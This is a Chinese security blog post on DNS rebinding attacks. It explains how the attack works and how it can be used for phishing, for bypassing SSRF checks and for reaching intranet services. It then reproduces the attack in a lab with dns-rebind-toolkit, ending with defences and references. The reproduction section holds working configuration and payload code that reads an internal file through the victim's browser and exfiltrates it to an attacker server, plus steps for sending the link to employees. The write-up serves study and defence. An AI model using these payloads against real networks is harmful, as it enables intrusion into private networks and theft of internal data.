<!DOCTYPE html>
<html lang="en">


<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>DNSRebind攻击 | 小九博客</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="format-detection" content="telphone=no, email=no">
    <meta name="root" content="/">
    <link rel="shortcut icon" href="/img/avatar.jpg"><meta name="keywords" content="小九博客,PHP,程序员,yii2,教程,黑客,信息安全,安全开发"><meta name="theme-color" content="#282a2c">

    
        
            <link rel="stylesheet" href="https://lf26-cdn-tos.bytecdntp.com/cdn/expire-1-M/bootstrap/4.5.3/css/bootstrap.min.css" type="text/css" media="all">
        
            <link rel="stylesheet" href="/css/fontawesome.min.css" type="text/css" media="all">
        
            <link rel="stylesheet" href="/css/iconfont.min.css?ver=3.1.0" type="text/css" media="all">
        
            <link rel="stylesheet" href="https://lf26-cdn-tos.bytecdntp.com/cdn/expire-1-M/layer/3.1.1/theme/default/layer.min.css" type="text/css" media="all">
        
            <link rel="stylesheet" href="/css/kratos.min.css?ver=3.2.5" type="text/css" media="all">
        
    
    <script src="https://lf3-cdn-tos.bytecdntp.com/cdn/expire-1-M/jquery/3.4.1/jquery.min.js"></script>
<meta name="generator" content="Hexo 5.3.0"></head>

<body>

<div class="k-header">
    <nav class="k-nav navbar navbar-expand-lg navbar-light fixed-top" style=&#34;background: #282a2c&#34;>
        <div class="container">
            <a class="navbar-brand" href="/">
                
                    <h1>小九博客</h1>
                
            </a>
            
                <button class="navbar-toggler navbar-toggler-right" id="navbutton" type="button" data-toggle="collapse"
                        data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false"
                        aria-label="Toggle navigation">
                    <span class="line first-line"></span>
                    <span class="line second-line"></span>
                    <span class="line third-line"></span>
                </button>
                <div id="navbarResponsive" class="collapse navbar-collapse">
                    <ul id="menu" class="navbar-nav ml-auto">
                        <li class="nav-item"><a title="首页" href="/" class="nav-link" aria-current="page">首页</a></li>
                        
                            
                            
                            <li class="nav-item ">
                                
                                    <a href="/categories/develop" title="编程开发"
                                       class="nav-link" aria-current="page">编程开发</a>
                                
                            </li>
                        
                            
                            
                            <li class="nav-item ">
                                
                                    <a href="/categories/security" title="信息安全"
                                       class="nav-link" aria-current="page">信息安全</a>
                                
                            </li>
                        
                            
                            
                            <li class="nav-item ">
                                
                                    <a href="/categories/resources" title="工具资源"
                                       class="nav-link" aria-current="page">工具资源</a>
                                
                            </li>
                        
                            
                            
                            <li class="nav-item ">
                                
                                    <a href="/categories/myspace" title="随笔"
                                       class="nav-link" aria-current="page">随笔</a>
                                
                            </li>
                        
                            
                            
                            <li class="nav-item dropdown">
                                
                                    <a href="#" title="在线工具" data-toggle="dropdown" aria-haspopup="true"
                                       aria-expanded="false" class="dropdown-toggle nav-link">在线工具</a>
                                    <ul class="dropdown-menu" aria-labelledby="menu-item-dropdown-13" role="menu">
                                        
                                            <li class="nav-item"><a title="Json解析"
                                                                    target="_blank" rel="noopener" href="http://www.bejson.com"
                                                                    class="dropdown-item">Json解析</a></li>
                                        
                                            <li class="nav-item"><a title="JavaRuntimeExec"
                                                                    href="/JavaRuntimeExecPayload.html"
                                                                    class="dropdown-item">JavaRuntimeExec</a></li>
                                        
                                    </ul>
                                
                            </li>
                        
                            
                            
                            <li class="nav-item ">
                                
                                    <a href="/about" title="关于"
                                       class="nav-link" aria-current="page">关于</a>
                                
                            </li>
                        
                    </ul>
                </div>
            
        </div>
    </nav>
    <div class="banner">
        <div class="overlay"></div>
        <div class="content text-center" style="background-image: url(/img/background.png);">
            <div class="introduce animated fadeInUp">
                <div class="title">小九博客</div>
                <div class="mate">Hack The World!</div>
            </div>
        </div>
    </div>
</div>
<div class="k-main banner" style="background:#f5f5f5">
    <div class="container">
        <div class="row">
            <div class="col-lg-8 details">
                <div class="article">
    
        <div class="breadcrumb-box">
            <ol class="breadcrumb">
                <li class="breadcrumb-item">
                    <a class="text-dark" href="/"> 首页</a>
                </li>
                <li class="breadcrumb-item">
                    <a class="text-dark"
                       href="/categories/security">信息安全</a>
                </li>
                <li class="breadcrumb-item active" aria-current="page"> 正文</li>
            </ol>
        </div>
    
    <div class="header">
        <h1 class="title">DNSRebind攻击</h1>
        <div class="meta">
            <div class="a-meta post-meta">
        <span class=" d-none d-md-block">
            <span class="mr-2"><i class="kicon i-calendar"></i>2022年02月23日</span>
            <!--            <span class="mr-2"><i class="kicon i-comments"></i><?php comments_number('0', '1', '%'); _e('条评论', 'kratos'); ?></span>-->
        </span>
    <span class="  d-block">
        </span>
    
</div>
        </div>
    </div>
    <div class="content">
        <h1 id="DNSRebind-DNS重绑定攻击"><a href="#DNSRebind-DNS重绑定攻击" class="headerlink" title="DNSRebind DNS重绑定攻击"></a>DNSRebind DNS重绑定攻击</h1><h2 id="1-原理"><a href="#1-原理" class="headerlink" title="1.原理"></a>1.原理</h2><p>为了保证DNS服务的可靠性，DNS响应记录A中包含一个TTL（time to live）值，表示当前解析结果的有效时间，客户端（浏览器）会在超过这个时间值后重新请求解析域名（取决于客户端是否遵循这个TTL值），得到的新响应中又会存在一个过期时间，客户端会再次去解析域名，如此保证获取到最新的域名解析结果。</p>
<p>若DNS服务前后响应返回的ip地址不一样，浏览器并不会认为跨域。如果域名后续解析到的ip为127.0.0.1、192.168.0.1等不同于先前解析结果，浏览器依然认为符合同源策略，会将请求发送到127.0.0.1机器上。如此就产生了DNS Rebinding攻击。</p>
<p>浏览器和操作系统均会存在DNS缓存，缓存时间一般不按照DNS服务器响应中的TTL值，比如固定为60s。</p>
<h2 id="2-攻击场景"><a href="#2-攻击场景" class="headerlink" title="2.攻击场景"></a>2.攻击场景</h2><p>用户访问到攻击者的网站<a target="_blank" rel="noopener" href="http://www.evil.com/">www.evil.com</a></p>
<p>该站点会创建一个隐藏的iFrame窗口，加载恶意攻击链接 uuid.evil.com:3000/password.txt，此时为第一次加载。</p>
<p>第一次加载时解析的IP仍然是攻击者的服务器IP。</p>
<p>站点中的JavaScript定时对iFrame窗口进行刷新，在后续的加载中解析的IP变更为内网IP，因此uuid.evil.com:3000/password.txt现在对应地址192.168.1.100:3000/password.txt，但此时因为DNS缓存的缘故，仍然会解析为先前攻击者服务器的IP。</p>
<p>此时通过不断的对iFrame窗口进行刷新，当客户端浏览器的DNS缓存失效，iFrame再次重新加载时，用户便成了一个”攻击中间人”，请求都由用户本地发起，对本地或局域网发送相关数据。</p>
<p>访问到敏感信息后再将信息传递给攻击者站点，<a target="_blank" rel="noopener" href="http://www.evil.com/uploadyourpass">www.evil.com/uploadyourpass</a></p>
<p>此时便完成了整个攻击。</p>
<h3 id="钓鱼场景"><a href="#钓鱼场景" class="headerlink" title="钓鱼场景"></a>钓鱼场景</h3><p>该攻击需要受害者访问攻击者网站触发，因此可用于钓鱼邮件目的。</p>
<p>以往的钓鱼往往需要目标下载可执行程序来执行，而该攻击仅需要目标保持网页访问即可，在访问中目标将充当”攻击中间人”将原本的本地命令/代码执行提升为远程利用。</p>
<h3 id="绕过SSRF检查"><a href="#绕过SSRF检查" class="headerlink" title="绕过SSRF检查"></a>绕过SSRF检查</h3><p>一些SSRF在修复时，仅在入口处对来路IP做了检查，判断为内网地址则拒绝访问，此时可利用DNSRebind特性，第一次返回外网地址，当程序执行后续步骤时，IP已重新绑定，再次解析会按照重新绑定的IP进行后续操作。</p>
<h3 id="攻击内网设施"><a href="#攻击内网设施" class="headerlink" title="攻击内网设施"></a>攻击内网设施</h3><p>企业往往只注重外网服务的安全检查和巡检，内网中的未授权、敏感信息泄漏问题往往不会即时整改，通过该攻击手法即可对内网服务发起攻击。</p>
<h2 id="3-复现结果"><a href="#3-复现结果" class="headerlink" title="3.复现结果"></a>3.复现结果</h2><p>最新Chrome浏览器已无法使用该攻击，仍然会被浏览器同源策略阻止.</p>
<p>在360安全浏览器最新版本(13.1.5188.0|内核版本86.0.4240.198)测试成功。</p>
<h2 id="4-复现步骤"><a href="#4-复现步骤" class="headerlink" title="4.复现步骤"></a>4.复现步骤</h2><blockquote>
<p>本次复现采用开源工具包DNS-Rebind-Toolkit实现，目标是窃取到内网中部署服务的组件信息及版本信息。</p>
</blockquote>
<p>环境信息：</p>
<table>
<thead>
<tr>
<th>名称</th>
<th>IP地址</th>
<th>开放服务及端口</th>
<th>其他</th>
</tr>
</thead>
<tbody><tr>
<td>内网服务</td>
<td>192.168.1.100</td>
<td>HTTP服务/3000端口</td>
<td>内网服务存在，url为192.168.1.100:3000/package.json</td>
</tr>
<tr>
<td>员工</td>
<td>192.168.1.200</td>
<td>None</td>
<td>使用360安全浏览器</td>
</tr>
<tr>
<td>攻击者</td>
<td>123.123.123.123</td>
<td>HTTP服务/80,3000端口</td>
<td>部署DNS-Rebind-Toolkit</td>
</tr>
</tbody></table>
<h3 id="DNS-Rebind-Toolkit部署"><a href="#DNS-Rebind-Toolkit部署" class="headerlink" title="DNS-Rebind-Toolkit部署"></a>DNS-Rebind-Toolkit部署</h3><p><strong>1.克隆仓库</strong></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git clone https://github.com/brannondorsey/dns-rebind-toolkit</span><br></pre></td></tr></table></figure>
<p><strong>2.配置攻击逻辑及攻击参数</strong></p>
<blockquote>
<p>本内容是基于实验环境且知晓对方存在3000端口，并且了解URL地址。当不了解具体情况时，可以看下一章节。</p>
</blockquote>
<p>修改<code>server.js</code>，将<code>    const defaultPorts = [80, 8008, 8060, 1400, 1337]</code>中除80以外的端口删除，添加3000端口。</p>
<blockquote>
<p>8008 8060 1400 1337端口是该工具包内置的PoC，包含Google Home and Roku products等产品的敏感信息泄漏漏洞利用PoC。</p>
</blockquote>
<p>修改<code>www/index.html</code>,删除统计以及确认弹窗，并将跳转地址修改为<code>./default-payloads.html</code>，完整代码如下:</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span> <span class="attr">lang</span>=<span class="string">&quot;sr-Latn-u-em-text&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>DNS Rebind Test<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">&quot;utf-8&quot;</span>&gt;</span></span><br><span class="line">    </span><br><span class="line">  <span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="javascript">        <span class="built_in">window</span>.location.href = <span class="string">&#x27;./default-payloads.html&#x27;</span>;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>修改<code>www/default-payloads.html</code>，该文件用于配置攻击参数以及攻击逻辑，文件加载时会新建一个iframe定时刷新构造好的链接地址，让受害者进行访问。</p>
<p>由于文件较大，此处直接贴源代码，增加注释以供参考：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">title</span>&gt;</span>Example launcher<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">p</span>&gt;</span>Open your developer&#x27;s console to see what&#x27;s happening.<span class="tag">&lt;/<span class="name">p</span>&gt;</span></span><br><span class="line">    <span class="comment">&lt;!-- This EventEmitter class must be included --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span> <span class="attr">type</span>=<span class="string">&quot;text/javascript&quot;</span> <span class="attr">src</span>=<span class="string">&quot;/share/js/EventEmitter.js&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span> <span class="attr">type</span>=<span class="string">&quot;text/javascript&quot;</span> <span class="attr">src</span>=<span class="string">&quot;/share/js/DNSRebindAttack.js&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span> <span class="attr">type</span>=<span class="string">&quot;text/javascript&quot;</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="javascript">    <span class="comment">// DNSRebindAttack.getLocalIPAddress() //通过WebRTC漏洞获取受害者局域网IP(本文192.168.1.200)</span></span></span><br><span class="line"><span class="javascript">    <span class="comment">// .then(ip =&gt; launch(ip)) //如果获取到，就针对该IP或者该IP段进行攻击</span></span></span><br><span class="line"><span class="javascript">    <span class="comment">// .catch(err =&gt; &#123;         //异常未获取到则使用指定IP。</span></span></span><br><span class="line"><span class="javascript">    <span class="comment">//     console.error(err)</span></span></span><br><span class="line"><span class="javascript">    <span class="comment">//     launch(&#x27;192.168.1.100&#x27;)</span></span></span><br><span class="line"><span class="javascript">    <span class="comment">// &#125;)</span></span></span><br><span class="line"><span class="javascript">    launch(<span class="string">&#x27;192.168.1.100&#x27;</span>) <span class="comment">//因为WebRTC漏洞在大部分浏览器中已经修复，而且实验环境知道目标IP，因此这里直接使用目标IP进行。</span></span></span><br><span class="line"><span class="javascript">    <span class="function"><span class="keyword">function</span> <span class="title">launch</span>(<span class="params">localIp</span>) </span>&#123;</span></span><br><span class="line"><span class="javascript">        <span class="comment">// launchRebindAttack(localIp, 80, &#x27;payloads/radio-thermostat.html&#x27;)</span></span></span><br><span class="line"><span class="javascript">        <span class="comment">// launchRebindAttack(localIp, 8008, &#x27;payloads/google-home.html&#x27;)</span></span></span><br><span class="line"><span class="javascript">        <span class="comment">// launchRebindAttack(localIp, 8060, &#x27;payloads/roku-info.html&#x27;)</span></span></span><br><span class="line"><span class="javascript">        launchRebindAttack(localIp, <span class="number">3000</span>, <span class="string">&#x27;payloads/test.html&#x27;</span>) <span class="comment">//加载重绑定攻击，目标IP 192.168.1.100，端口3000，加载指定Payload</span></span></span><br><span class="line"><span class="javascript">        <span class="comment">// launchRebindAttack(localIp, 80, &#x27;payloads/phillips-hue.html&#x27;)</span></span></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"><span class="javascript">    <span class="function"><span class="keyword">function</span> <span class="title">launchRebindAttack</span>(<span class="params">localIp, remotePort, payload</span>) </span>&#123;</span></span><br><span class="line"></span><br><span class="line"><span class="javascript">        <span class="comment">// convert 192.168.1.1 into array from 192.168.1.0 - 192.168.1.255</span></span></span><br><span class="line"><span class="javascript">        <span class="keyword">const</span> first3Octets = localIp.substring(<span class="number">0</span>, localIp.lastIndexOf(<span class="string">&#x27;.&#x27;</span>))</span></span><br><span class="line"><span class="javascript">        <span class="comment">// const ips = [...Array(256).keys()].map(octet =&gt; `$&#123;first3Octets&#125;.$&#123;octet&#125;`) //如果需要对C段进行尝试，则移除该注释。</span></span></span><br><span class="line">        </span><br><span class="line"><span class="javascript">        <span class="keyword">const</span> ips = [<span class="string">&#x27;192.168.1.100&#x27;</span>] <span class="comment">//这里不进行C段尝试，直接指定目标IP</span></span></span><br><span class="line"></span><br><span class="line"><span class="javascript">        <span class="keyword">const</span> rebind = <span class="keyword">new</span> DNSRebindAttack(<span class="string">&#x27;rebind.network&#x27;</span>, remotePort) <span class="comment">//使用rebind.network公开的DNSRebind服务进行攻击</span></span></span><br><span class="line"><span class="javascript">        rebind.attack(ips, <span class="string">&#x27;123.123.123.123&#x27;</span>, payload, <span class="number">200</span>) <span class="comment">//需要攻击的IP，设置第一次请求返回的IP（建议设置为攻击者服务器IP），对应payload，发包间隔时间。</span></span></span><br><span class="line"></span><br><span class="line"><span class="javascript">        rebind.on(<span class="string">&#x27;iframe-added&#x27;</span>, <span class="function">(<span class="params">ip, src</span>) =&gt;</span> &#123;</span></span><br><span class="line"><span class="javascript">            <span class="comment">//iframe创建后执行的操作，按需设置</span></span></span><br><span class="line">        &#125;)</span><br><span class="line"></span><br><span class="line"><span class="javascript">        rebind.on(<span class="string">&#x27;all-iframes-added&#x27;</span>, <span class="function">() =&gt;</span> &#123;</span></span><br><span class="line">				</span><br><span class="line">        &#125;)</span><br><span class="line"></span><br><span class="line"><span class="javascript">        rebind.on(<span class="string">&#x27;iframe-removed&#x27;</span>, <span class="function">(<span class="params">ip, src</span>) =&gt;</span> &#123;</span></span><br><span class="line"><span class="javascript">        	<span class="comment">// console.log(payload, &#x27;iframe-removed&#x27;, ip, src)</span></span></span><br><span class="line">        &#125;)</span><br><span class="line">    </span><br><span class="line"></span><br><span class="line"><span class="javascript">        rebind.nodes.on(<span class="string">&#x27;rebind&#x27;</span>, <span class="function">(<span class="params">ip</span>) =&gt;</span> &#123;</span></span><br><span class="line"><span class="javascript">            <span class="built_in">console</span>.log(payload, <span class="string">&#x27;node rebind&#x27;</span>, ip)</span></span><br><span class="line">        &#125;)</span><br><span class="line">        </span><br><span class="line"><span class="javascript">        rebind.nodes.on(<span class="string">&#x27;exfiltrate&#x27;</span>, <span class="function">(<span class="params">ip, data</span>) =&gt;</span> &#123;</span></span><br><span class="line"><span class="javascript">            <span class="built_in">console</span>.log(payload, <span class="string">&#x27;node exfiltrate&#x27;</span>, ip, data)</span></span><br><span class="line">        &#125;)</span><br><span class="line"></span><br><span class="line"><span class="javascript">        rebind.nodes.on(<span class="string">&#x27;fatal&#x27;</span>, <span class="function">(<span class="params">ip, data</span>) =&gt;</span> &#123;</span></span><br><span class="line"><span class="javascript">            <span class="comment">// console.error(payload, &#x27;node fatal&#x27;, ip, data)</span></span></span><br><span class="line">        &#125;)</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p><strong>3.编写Payload</strong></p>
<p>编写Payload，<code>payloads/test.html</code>，直接来看文件内容及注释:</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>WikiDownload Payload<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span> <span class="attr">type</span>=<span class="string">&quot;text/javascript&quot;</span> <span class="attr">src</span>=<span class="string">&quot;/share/js/DNSRebindNode.js&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span> <span class="attr">type</span>=<span class="string">&quot;text/javascript&quot;</span>&gt;</span></span><br><span class="line"><span class="javascript">(<span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span>&#123;</span></span><br><span class="line"></span><br><span class="line"><span class="javascript">    <span class="comment">// note, Chromecast requires Origin to be unset for GET requests to /setup,</span></span></span><br><span class="line"><span class="javascript">    <span class="comment">// however Firefox doesn&#x27;t allow you to do this with the fetch API, so this exploit</span></span></span><br><span class="line"><span class="javascript">    <span class="comment">// doesn&#x27;t work in firefox.</span></span></span><br><span class="line">    attack()</span><br><span class="line"><span class="javascript">    .then(<span class="function">() =&gt;</span> &#123;&#125;,</span></span><br><span class="line">          err =&gt; &#123;</span><br><span class="line"><span class="javascript">              <span class="built_in">console</span>.error(err)</span></span><br><span class="line"><span class="javascript">              DNSRebindNode.emit(<span class="string">&#x27;fatal&#x27;</span>, err.message)</span></span><br><span class="line">          &#125;</span><br><span class="line">    )</span><br><span class="line"><span class="javascript">    .then(<span class="function">() =&gt;</span> DNSRebindNode.destroy())</span></span><br><span class="line"></span><br><span class="line"><span class="javascript">    <span class="keyword">async</span> <span class="function"><span class="keyword">function</span> <span class="title">attack</span>(<span class="params"></span>) </span>&#123;</span></span><br><span class="line"></span><br><span class="line"><span class="javascript">        <span class="keyword">const</span> getOptions = DNSRebindNode.fetchOptions()</span></span><br><span class="line"></span><br><span class="line"><span class="javascript">        <span class="keyword">try</span> &#123;</span></span><br><span class="line"><span class="javascript">            <span class="keyword">const</span> opts = &#123; <span class="attr">fetchOptions</span>: getOptions &#125;</span></span><br><span class="line">            </span><br><span class="line"><span class="javascript">            <span class="comment">//设置要访问的PoC地址，</span></span></span><br><span class="line"><span class="javascript">            <span class="keyword">const</span> result = <span class="keyword">await</span> DNSRebindNode.rebind(<span class="string">`http://<span class="subst">$&#123;location.host&#125;</span>/package.json`</span>, opts)</span></span><br><span class="line"><span class="javascript">            <span class="keyword">if</span> (result.ok) &#123;</span></span><br><span class="line"><span class="javascript">                <span class="keyword">const</span> json = <span class="keyword">await</span> result.text()</span></span><br><span class="line">                </span><br><span class="line"><span class="javascript">                <span class="comment">//将文件保存到攻击服务器(123.123.123.123)，保存文件名package.json，类型支持json、xml、txt</span></span></span><br><span class="line"><span class="javascript">                <span class="keyword">return</span> <span class="keyword">await</span> DNSRebindNode.exfiltrate(<span class="string">&#x27;package.json&#x27;</span>, json, <span class="string">&#x27;json&#x27;</span>)</span></span><br><span class="line"><span class="javascript">            &#125; <span class="keyword">else</span> &#123;</span></span><br><span class="line"><span class="javascript">                <span class="keyword">return</span> <span class="built_in">Promise</span>.reject(result)</span></span><br><span class="line">            &#125;</span><br><span class="line"><span class="javascript">        &#125; <span class="keyword">catch</span> (err) &#123;</span></span><br><span class="line"><span class="javascript">            <span class="keyword">return</span> <span class="built_in">Promise</span>.reject(err)</span></span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;)()</span><br><span class="line"><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p><strong>启动服务</strong></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">node server</span><br></pre></td></tr></table></figure>
<h3 id="设置DNS解析"><a href="#设置DNS解析" class="headerlink" title="设置DNS解析"></a>设置DNS解析</h3><p>添加A记录到攻击服务器123.123.123.123,实验中使用域名testtestao.top</p>
<h3 id="将恶意链接发送给员工"><a href="#将恶意链接发送给员工" class="headerlink" title="将恶意链接发送给员工"></a>将恶意链接发送给员工</h3><p>员工(192.168.1.200) 使用360安全浏览器访问该域名testtestao.top。</p>
<p>在等待数秒后，Payload使得员工成为了”攻击中间人”，访问了内网服务，并将该文件上传到了恶意服务器。</p>
<p><img src="https://cdn.jsdelivr.net/gh/Nash-x9/blog_assets@latest/img/360DnsRebind.png" alt="360DnsRebind.png"></p>
<p>服务器日志返回</p>
<p><img src="https://cdn.jsdelivr.net/gh/Nash-x9/blog_assets@latest/img/DNSRebindGetData.png" alt="DNSRebindGetData.png"></p>
<h2 id="5-防护措施"><a href="#5-防护措施" class="headerlink" title="5.防护措施"></a>5.防护措施</h2><h3 id="用户侧"><a href="#用户侧" class="headerlink" title="用户侧"></a>用户侧</h3><ul>
<li><p>本地管理DNS请求，对域名解析为本地或专用网络IP的行为进行白名单限制。</p>
</li>
<li><p>及时更新浏览器</p>
</li>
<li><p>对发来的外部链接谨慎访问，不在专用网络打开</p>
</li>
</ul>
<h3 id="业务侧"><a href="#业务侧" class="headerlink" title="业务侧"></a>业务侧</h3><ul>
<li>HTTP服务绑定HOST，对HOST头进行验证</li>
<li>内网服务也建议绑定TLS/SSL证书</li>
<li>整改内网中存在的未授权、敏感信息泄漏问题 :)</li>
</ul>
<h2 id="6-一些其他细节"><a href="#6-一些其他细节" class="headerlink" title="6.一些其他细节"></a>6.一些其他细节</h2><p><strong>实验环境是知道目标内网服务IP进行的，当不知道目标服务IP如何进行？</strong></p>
<p>在dns-rebind-toolkit中提供了一些思路，其使用了WebRTC漏洞来获取用户的真实IP，获取到后对用户真实IP所在C段进行攻击尝试，因此可以借助这个思路，当通过其他漏洞或手段拿到一个内网IP后，对该内网下的其他IP进行遍历和漏洞测试。</p>
<blockquote>
<p>由于WebRTC漏洞在2015年公布，现在大部分的浏览器已经不支持该漏洞。</p>
</blockquote>
<p><strong>实验环境是通过公共DNSRebind服务进行攻击的，如何自己搭建？</strong></p>
<p>实验中的rebind.network服务也已开源，可以很轻松的搭建部署。Github:<a target="_blank" rel="noopener" href="https://github.com/brannondorsey/whonow">https://github.com/brannondorsey/whonow</a></p>
<h2 id="7-引用或参考资料"><a href="#7-引用或参考资料" class="headerlink" title="7.引用或参考资料"></a>7.引用或参考资料</h2><ul>
<li>WebRTC<ul>
<li><a target="_blank" rel="noopener" href="https://www.cvedetails.com/cve/CVE-2016-10600/">https://www.cvedetails.com/cve/CVE-2016-10600/</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/brannondorsey/dns-rebind-toolkit/commit/98a6abab1e21cb4304d97f586fe28c706bb307a0">https://github.com/brannondorsey/dns-rebind-toolkit/commit/98a6abab1e21cb4304d97f586fe28c706bb307a0</a></li>
</ul>
</li>
<li>DNSRebind<ul>
<li><a target="_blank" rel="noopener" href="https://paper.seebug.org/390/">https://paper.seebug.org/390/</a></li>
<li><a target="_blank" rel="noopener" href="https://bbs.pediy.com/thread-230047.htm">https://bbs.pediy.com/thread-230047.htm</a></li>
<li><a target="_blank" rel="noopener" href="https://blog.csdn.net/haoren_xhf/article/details/80050632">https://blog.csdn.net/haoren_xhf/article/details/80050632</a></li>
</ul>
</li>
<li>工具<ul>
<li><a target="_blank" rel="noopener" href="https://github.com/brannondorsey/whonow">https://github.com/brannondorsey/whonow</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/brannondorsey/dns-rebind-toolkit">https://github.com/brannondorsey/dns-rebind-toolkit</a>
 </li>
</ul>
</li>
</ul>
